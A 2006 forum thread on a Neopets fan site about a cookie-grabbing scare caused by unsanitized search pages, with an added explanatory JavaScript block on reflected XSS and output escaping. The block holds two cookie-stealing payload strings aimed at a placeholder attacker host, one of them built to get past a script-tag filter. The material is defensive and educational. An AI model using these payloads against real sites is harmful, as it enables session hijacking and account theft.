For Neopets ONLY discussion.
Topic locked

Mon Jan 09, 2006 10:28 am

dolphinling, is Adblock working with Flash again? For a while I couldn't play games and Adblock was the problem.

Mon Jan 09, 2006 10:33 am

You are crazy super awesome dolphinling.

Everything you said was perfectly clear and brilliant but I do have a question about the script loading in iframes. Is there a way to prevent any iframe code from being used at all in your browser? (I'm assuming that using such code is the preferred method used by the Evil People since it's less obvious than just sending you to your SDB.)

Thanks!

Mon Jan 09, 2006 10:49 am

puck wrote:dolphinling, is Adblock working with Flash again? For a while I couldn't play games and Adblock was the problem.

I don't know. It never caused problems for me. This thread on mozillazine seems to have some ideas, though I can't vouch for it.

stinkyllama wrote:Is there a way to prevent any iframe code from being used at all in your browser? (I'm assuming that using such code is the preferred method used by the Evil People since it's less obvious than just sending you to your SDB.)

Not that I know of. Frames and iframes are quite common on the web (despite being awful design...) and disabling them would mess up a lot of sites. Besides, there are other ways than iframes of forcing you to the page: they could just redirect you there with javascript.
Last edited by dolphinling on Mon Jan 09, 2006 11:20 am, edited 2 times in total.

Mon Jan 09, 2006 11:12 am

dolphinling wrote:Not that I know of. Frames and iframes are quite common on the web (despite being awful design...) and disabling them would mess up a lot of sites. Besides, there are other ways than iframes of forcing you to the page: they could just redirect you there with javascript.

Ah, true. Thanks for the reply though.

Also, if you're looking to add to your list of pages that can have code modified after the "?", I believe the LDP comic is also vulnerable along with any other page with a search function (TP, Auctions, Help, etc.)...

Not cool.

Mon Jan 09, 2006 11:12 am

I dunno if this has anything to do with it, but I just had a weird experience in a shop. I was buying a King Kelpbeard's Blessing, and they had 4 in the shop. When I went to buy one I clicked it and got the pop-up window, but I know I pressed cancel, yet my money got taken away and I have one in my items. So I tried it again, pressed cancel, and it still bought the item, so I have two. Not much of an issue because I'll sell one, but it just looked weird. I didn't like the look of the shop (it didn't have anything weird about it, but I just had a feeling); that's why I clicked cancel. But I logged off, changed my password, and hopefully I'll be alright. I just found it weird.

Mon Jan 09, 2006 11:25 am

stinkyllama wrote:Also, if you're looking to add to your list of pages that can have code modified after the "?", I believe the LDP comic is also vulnerable along with any other page with a search function (TP, Auctions, Help, etc.)...

Not cool.

No, it's luckily not quite that bad. Only certain search functions are vulnerable: ones that pass the search string through without sanitizing it. If you try it in auctions, the <script> tag is removed; if you try it in the help section, it doesn't even tell you what you searched for in the first place.

I've searched through a large section of the site, and I've only found two that were vulnerable. That doesn't mean there aren't any more, though, and if scammers spend even more time looking than me they might find some. I would rate the current threat level at yellow if you've protected yourself with my adblock thing, and red if you haven't.

I'm going to bed now, and I advise everyone to be careful until TNT clears this up.
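The post above describes the difference between a search page that passes the search string straight through and one that strips `<script>` or never echoes the term at all. The following is an added example, not code from this thread or from the site, showing that difference in JavaScript. The `/search?q=` path, the renderer shapes, the `attacker.example` host and the two payload strings are all constructed for illustration.

```javascript
// Added example, not code from the thread or from Neopets: a reflected
// search echo in three forms, to show why "only some searches are
// vulnerable". The search path, parameter name and payloads are constructed.

// Pull the "?" part of a URL into a key/value map (the data a search page
// reflects back to the user).
function parseQuery(url) {
  const params = {};
  const idx = url.indexOf("?");
  if (idx === -1) return params;
  const decode = (s) => decodeURIComponent(s.replace(/\+/g, " "));
  for (const pair of url.slice(idx + 1).split("&")) {
    if (!pair) continue;
    const [rawKey, rawVal = ""] = pair.split("=");
    params[decode(rawKey)] = decode(rawVal);
  }
  return params;
}

// 1. Unsanitized: the term is pasted into the page as-is. Whatever markup
//    the link carried now runs in the victim's session, with their cookie.
function renderUnsafe(term) {
  return `<p>You searched for: ${term}</p>`;
}

// 2. Tag blacklist: only <script> tags are removed. This stops the simplest
//    payload, but any element with an inline event handler still fires.
function renderScriptStripped(term) {
  return `<p>You searched for: ${term.replace(/<\/?script[^>]*>/gi, "")}</p>`;
}

// 3. Output encoding: every character that can open markup is escaped, so
//    the term can only ever be displayed as text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderEscaped(term) {
  return `<p>You searched for: ${escapeHtml(term)}</p>`;
}

// Does the echoed term introduce any element tag into the page? An injected
// tag is what the browser would parse into runnable markup.
function echoContainsTag(html) {
  const body = html.slice("<p>You searched for: ".length, -"</p>".length);
  return /<[a-z!/]/i.test(body);
}

// Constructed payloads of the kind a scammer's link would carry. Both send
// document.cookie to a placeholder attacker-controlled host.
const SCRIPT_PAYLOAD =
  "<script>location='http://attacker.example/?c='+document.cookie</script>";
const IMG_PAYLOAD =
  "<img src=x onerror=\"location='http://attacker.example/?c='+document.cookie\">";

// Run a link through each renderer and report which ones let a tag through.
function assess(url) {
  const term = parseQuery(url).q || "";
  return {
    unsafe: echoContainsTag(renderUnsafe(term)),
    scriptStripped: echoContainsTag(renderScriptStripped(term)),
    escaped: echoContainsTag(renderEscaped(term)),
  };
}

const link = "/search?q=" + encodeURIComponent(IMG_PAYLOAD);
console.log(assess(link));
```

The script-stripping renderer looks safe against the first payload and fails against the second, which is why a blacklist is not the same thing as the page being "protected"; only the escaping renderer keeps both payloads as inert text. It also shows why blocking iframes in the browser would not help: the problem is on the server's side of the "?", in how the term is written back into the page.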

Mon Jan 09, 2006 1:35 pm

Cheers very much dolphinling; I'll add this info to the front page so that more people can see it :)

Mon Jan 09, 2006 4:17 pm

Arnold wrote:I dunno if this has anything to do with it, but I just had a weird experience in a shop. I was buying a King Kelpbeard's Blessing, and they had 4 in the shop. When I went to buy one I clicked it and got the pop-up window, but I know I pressed cancel, yet my money got taken away and I have one in my items. So I tried it again, pressed cancel, and it still bought the item, so I have two.

I've been having the same problem since before this whole cg scare broke out. I just thought it was a good ol' fashioned bug.

Thank you for the information, dolphinling. Methinks I'll avoid playing in Neopia for a while. :(

Mon Jan 09, 2006 4:41 pm

dolphinling wrote:...

Skynetmain wrote:Two questions:
1) Would someone have to have with Neopets knowledge to go after the SDB like described above, or could that just be grabbed in a random attack?

Not quite sure I understand this... The person creating the attack would have to have at least a bit of neopets knowledge, yes. But if they didn't know anything about neopets, why would they be taking your stuff anyway? ;) If that's not what you mean, try restating it?

...

Thank you. You have answered exactly how I thought. It was just a crazy random question asked while half asleep.


stampsyne wrote:
Skynetmain wrote:2) How long does it take for password requests to get sent out? I just got an e-mail saying I requested one and immediately changed it. I remember requesting one months ago and never getting a reply, but I'm still paranoid.

The good news is this should not in any way request your password from neopets. The bad news is that they would not need to because the cookie grabber would already tell them.

So I am just being paranoid, except if they cg-ed me already, which seems unlikely since it had been many days since my last visit to any user run area and nothing bad has happened to me yet.

Thanks to all who helped me out :hug: :peace: <3 0:)

Mon Jan 09, 2006 6:31 pm

Dolphinling, thank you for your wonderful advice. :)

I am using IE. My question is, will that MS critical update protect me from all this?

Many thanks,

SS:)

Mon Jan 09, 2006 6:46 pm

Okay, I'm back awake and have a few things to report.

First: people on the neoboards are claiming that they were cookiegrabbed by following a link to trades. I'm looking into it, but haven't found anything yet. They didn't sound like they knew what they were talking about, but it's possible the Evil People found something I haven't. In the meantime, as always, be careful.

Second: I have just got in contact with programmers, and it has been forwarded to the appropriate person. Hopefully this means it will be fixed soon :)

Mon Jan 09, 2006 6:47 pm

ssandgirls, from my limited understanding, no, that update will not have any effect on what's going on. This isn't just an issue of looking at an image (which I think is what that fix was for).

My question? What's the other place that's been found that has this vulnerability? Is it the shop wizard/SSW/auction genie, the search on the sidebar, Help search, etc. ... meaning just any search in general? As in anything that could end with a ? like the SDB searches do.

If so, then for all intents and purposes the only things you could/should do are feed your pets, play some games, go to the bank, your guild and I guess the boards. No shopping unless it's main shops, no going to lookups, petpages, pet descriptions, user shops, searching for things on the wizard/auctions/tp or even via the Help or sidebar.

I would really like to see the site down and all of this taken care of. It just seems that it would be better to try to fix these problems which could (and already has) impact so many people, many completely unaware of it.

This is so disturbing. I know, it's "just" pixels as far as the site. But it could have ramifications beyond the site. Just having someone's email could open a huge can of worms. Please TNT, don't try to sweep this under the rug and pretend it hasn't happened and there is something happening. Take care of it and let people know. I also would love to see the people behind this caught. To me, doing things like this on a game site means they're practicing for bigger things. Better to get them now and maybe stop them from trying to get to our banking sites, things like that.

Mon Jan 09, 2006 7:02 pm

ssandgirls wrote:Dolphinling, thank you for your wonderful advice. :)

I am using IE. My question is, will that MS critical update protect me from all this?

No it will not. That patch is for something much worse that would let anyone take over your computer entirely--you could e.g. have your credit card details stolen. The cookiegrabber thing is neopets specific. You should absolutely absolutely absolutely have that patch if you're on windows, but it's not what's in question here.

everconfused wrote:My question? What's the other place that's been found that has this vulnerability? Is it the shop wizard/SSW/auction genie, the search on the sidebar, Help search, etc. ... meaning just any search in general? As in anything that could end with a ? like the SDB searches do.

The other place that I know of is the World Challenge game search page. It's not all searches, as most of them have been protected from things like this. The WC search and the SDB are new, though, so I guess they made sure of it in the past, but forgot to with these.

everconfused wrote:I would really like to see the site down and all of this taken care of. It just seems that it would be better to try to fix these problems which could (and already has) impact so many people, many completely unaware of it.

The site doesn't need to come down to fix this. The fix can go into place without any disturbance at all.

Mon Jan 09, 2006 7:07 pm

It Is Fixed!
The SDB and WC searches are now protected.

There may be others, though, and I expect they'll be doing their own looking to make sure none are missed.

Edit: Oops, double post. heh.

Mon Jan 09, 2006 9:36 pm

Thank goodness! Thanks so much for your hard work, dolphinling! I'll be checking back at the forums for updates.